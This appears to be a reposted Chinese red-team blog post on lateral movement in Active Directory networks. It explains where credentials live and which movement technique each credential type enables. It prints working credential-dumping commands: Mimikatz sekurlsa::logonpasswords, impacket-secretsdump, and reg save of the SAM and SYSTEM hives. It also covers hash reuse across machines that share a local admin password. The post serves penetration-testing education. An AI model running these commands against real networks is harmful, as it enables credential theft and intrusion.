文章总结： 本文深入探讨AD渗透中的横向移动技术，重点解析LSASS内存和SAM数据库的凭据提取方法，详细说明NTLM哈希、Kerberos票据等不同凭据对应的Pass-the-Hash、Pass-the-Ticket等横向移动技术应用场景，并强调在多机共用本地管理员密码环境下的安全风险与实战避坑要点。 综合评分： 87 文章分类： 渗透测试,内网渗透,红队,实战经验,漏洞分析

拿到一台机器之后：AD横向移动技术实战手册

原创

极客零零七 极客零零七

极客零零七

2026年4月8日 14:30 加拿大

极客零零七 · AD攻击系列 · 第4篇

在AD渗透中，”拿到第一台机器”只是开始。你面前是一个由数百甚至数千台机器组成的网络，你的目标在网络深处的某台域控上。

横向移动（Lateral Movement）就是从A机器跳到B机器的技术。本文不做工具用法的罗列——AD速查表已经覆盖了命令层面。本文聚焦的是：在什么场景下用什么技术、为什么、以及怎么避免踩坑。

一、凭据在哪里：先搞清楚你能偷到什么

在横向移动之前，你需要从当前机器上提取可用的凭据。不同的凭据类型决定了你能用哪种横向移动技术。

LSASS内存：凭据的金矿

## Mimikatz（经典）mimikatz# privilege::debugmimikatz# sekurlsa::logonpasswords
## 输出示例：## Authentication Id : 0 ; 462823 (00000000:00070f67)## Session           : Interactive from 2## User Name         : admin_t1## Domain            : DOMAIN## Logon Server      : DC01## SID: S-1-5-21-xxx-1104## msv :##  [00000003] Primary##  * Username : admin_t1##  * Domain   : DOMAIN##  * NTLM     : a]b8e3c4f77d2a05cf6e2...##  * SHA1     : 9d2b7c8e5a...## tspkg :## wdigest :     ← Win2012R2以下可能有明文密码## kerberos :##  * Username : admin_t1##  * Domain   : DOMAIN.LOCAL##  * Password : (null)    ← 通常为空，除非WDigest启用

你能获得：

• NTLM哈希 → Pass-the-Hash
• Kerberos票据 → Pass-the-Ticket
• 明文密码（老系统或特殊配置） → 直接登录

SAM数据库：本地账户密码

## 远程导出（需管理员权限）impacket-secretsdump [email protected] -hashes :NTLM_HASH
## 本地导出reg save HKLM\SAM sam.bakreg save HKLM\SYSTEM system.bakimpacket-secretsdump -sam sam.bak -system system.bak LOCAL

关键提示：如果多台机器使用相同的本地管理员密码（这在没有LAPS的环境中极其常见），一个本地管理员哈希可以横向移动到所有这些机器。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：极客零零七 极客零零七 极客零零七《拿到一台机器之后：AD横向移动技术实战手册》